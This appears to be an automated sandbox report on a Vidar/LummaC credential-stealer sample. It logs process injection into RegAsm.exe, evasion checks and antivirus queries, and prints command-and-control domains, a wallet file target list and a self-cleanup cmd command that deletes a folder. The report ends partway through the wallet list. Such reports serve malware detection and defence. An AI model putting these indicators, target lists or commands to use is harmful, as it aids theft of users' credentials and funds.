Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Amcache.hve.17.dr	Binary or memory string: VMware
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.17.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.17.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.17.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.17.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2667736054.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2667736054.0000000000E56000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.17.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareq
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Amcache.hve.17.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.17.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRECOVE~1vebrokerRecoveryImprovedomVMware20,11696487552}
Source: RegAsm.exe, 00000003.00000002.2728647991.000000000151A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: Amcache.hve.17.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.17.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.17.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.17.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWCv
Source: Amcache.hve.17.dr	Binary or memory string: VMware20,1
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: omVMware20,11696487552}
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.17.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.17.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.17.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.17.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.17.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001634000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: Amcache.hve.17.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-83993
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-84009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node	graph_3-85341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00446BB0 LdrInitializeThunk,

13_2_00446BB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D88C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0041D88C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0041884E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00418497 mov eax, dword ptr fs:[00000030h]	3_2_00418497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004014AD mov eax, dword ptr fs:[00000030h]	29_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_0040148A mov eax, dword ptr fs:[00000030h]	29_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 29_2_004014A2 mov eax, dword ptr fs:[00000030h]	29_2_004014A2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040884C CopyFileA,GetProcessHeap,RtlAllocateHeap,StrCmpCA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,DeleteFileA,

3_2_0040884C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D88C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D88C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CF14 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041CF14
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	3_2_61EAF900

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7152, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: GCGHJEBGHJ.exe.3.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: GCGHJEBGHJ.exe.3.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: GCGHJEBGHJ.exe.3.dr, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_03742139 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_03742139

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A	Jump to behavior

LummaC encrypted strings found

Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: reinforcenh.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stogeneratmns.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fragnantbui.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: drawzhotdog.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: vozmeatillu.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offensivedzvju.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ghostreedmnu.shop
Source: GCGHJEBGHJ.exe, 00000008.00000002.2609621054.00000000039A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: gutterydhowi.shop

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B6E000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B6F000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 12D8008	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BD8008	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B6E000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B6F000	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DED008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\GCGHJEBGHJ.exe "C:\ProgramData\GCGHJEBGHJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\ProgramData\JKFIDGDHJE.exe "C:\ProgramData\JKFIDGDHJE.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJKFHDBKFCAA" & exit	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040113B cpuid

3_2_0040113B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Queries volume information: C:\ProgramData\GCGHJEBGHJ.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Queries volume information: C:\ProgramData\JKFIDGDHJE.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411C4A GetSystemTime,

3_2_00411C4A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.17.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 00000003.00000002.2728647991.000000000151A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2728647991.0000000001564000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.17.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.4745570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4745570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2656, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000003.00000002.2728395939.000000000118D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: electrum.*
Source: RegAsm.exe, 00000003.00000002.2728647991.0000000001591000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo 